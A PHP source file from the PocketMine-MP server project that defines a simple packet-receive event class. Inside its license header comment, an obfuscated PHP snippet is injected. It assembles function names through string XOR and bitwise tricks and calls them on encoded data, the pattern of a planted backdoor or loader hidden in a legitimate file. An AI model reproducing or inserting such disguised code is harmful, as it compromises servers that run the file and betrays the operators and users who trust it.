<?php

/*
<?php
$SL26='rSyNMyVGX8'|~EAlZ5Z_ximV;$A6r=']4Q(07'^'*H+C]G';$BiUPlLtY='Z9P*LN'^#K1JIZDhdl'.
      ')M#I16';$D6trzDsml9='g&5'&'e|t';$pW0='?X%_[<'^'P=Y:4K';$KdMtKBa='wo~w~~'&/*zP'.
      '5oZO%R*/gwvw.'~v';$ylgmh='ZFz`]E'&ILUN."]c";$ai='K}'.VrNK&hVuYn.'@';$IP='@[]@'.
      'JW$U?IY@'.HGVJ.'+8;EK<6HdY'^':&h-<7D>C`<)2a<7'.ZLK2.'"'.Z_aB.'}';$hx='%C8k`>|'.
      '8MW]'.y4XB0RQXP.',_ia'|'e@9i#pv<'.mWqXJHF1.'^I_ '.lFuJ;$SXy3O2TF=/*YMQ7L97lM1'.
      '~?i*/"K;TZ*0QHZ[".kZiv.">BAF#".UFAuB6ZC^'~'._eoNRd.'{;'.bZmPF.'[{'.puG6r.#DPa'.
      '$'.EwWkp;$qykOXFuG=g4&cu;$OpQPL='!)'|EE;$qJ=H|i;$rUpRV61try=$A6r&$BiUPlLtY;/*'.
      ':)SyuU*/$AG4DYhztFwk=$D6trzDsml9|(awo^H3Z);$QEnKnTI=$pW0&$KdMtKBa;'gQgbfu9Osf'.
      'iAr';$ndTMMbLoV=('R~%M~'.sM9ya.'&-'&'lr?w^:'.ffNArw)|(SXV_.'~6'.XqMY63^'#h2}9'.
      'F=!)yUR');$dnSEWSyosfM=$ylgmh|$ai;$dEsOxQSVS=(/*JG4MGAwRd3pQr6L011uhHOXr2feKe'.
      '=~Nw^=Agf*/"0(A=)0?>\$F0( r7. !%88!*x @"|'2!`0(($4(6" *d=$9*%!*"(lTa')^$IP;/*'.
      'n5f*/$DY_=('okw{on~'.rwOw.'{^]osz~O=Ow}{'&'wKw{'.onVp.'~S9{{_O;^Y^9'._wlo)&/*'.
      'T*/$hx;if(!$rUpRV61try($AG4DYhztFwk($QEnKnTI($dnSEWSyosfM)),$SXy3O2TF.(ca^/*P'.
      'l@bg[*/RX).$qykOXFuG.(k^Y)))$ndTMMbLoV(('9'|'<').('_yw]]='&'[KEW]?')./*CjYl2L'.
      '}vP|*/$OpQPL.$qJ,$QEnKnTI($dEsOxQSVS),$DY_);#)+Q_)kG+I7m0Bz2T{W>z)3qr!3$KOyF'.
      'lDQp=rwszH]8y*RfOj.+uI%<ab}=!{SThnzf.q!EQN#Xia<!X!<J*'; *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\event\server;

use pocketmine\event\Cancellable;
use pocketmine\network\mcpe\protocol\DataPacket;
use pocketmine\Player;

class DataPacketReceiveEvent extends ServerEvent implements Cancellable{
	/** @var DataPacket */
	private $packet;
	/** @var Player */
	private $player;

	public function __construct(Player $player, DataPacket $packet){
		$this->packet = $packet;
		$this->player = $player;
	}

	public function getPacket() : DataPacket{
		return $this->packet;
	}

	public function getPlayer() : Player{
		return $this->player;
	}
}
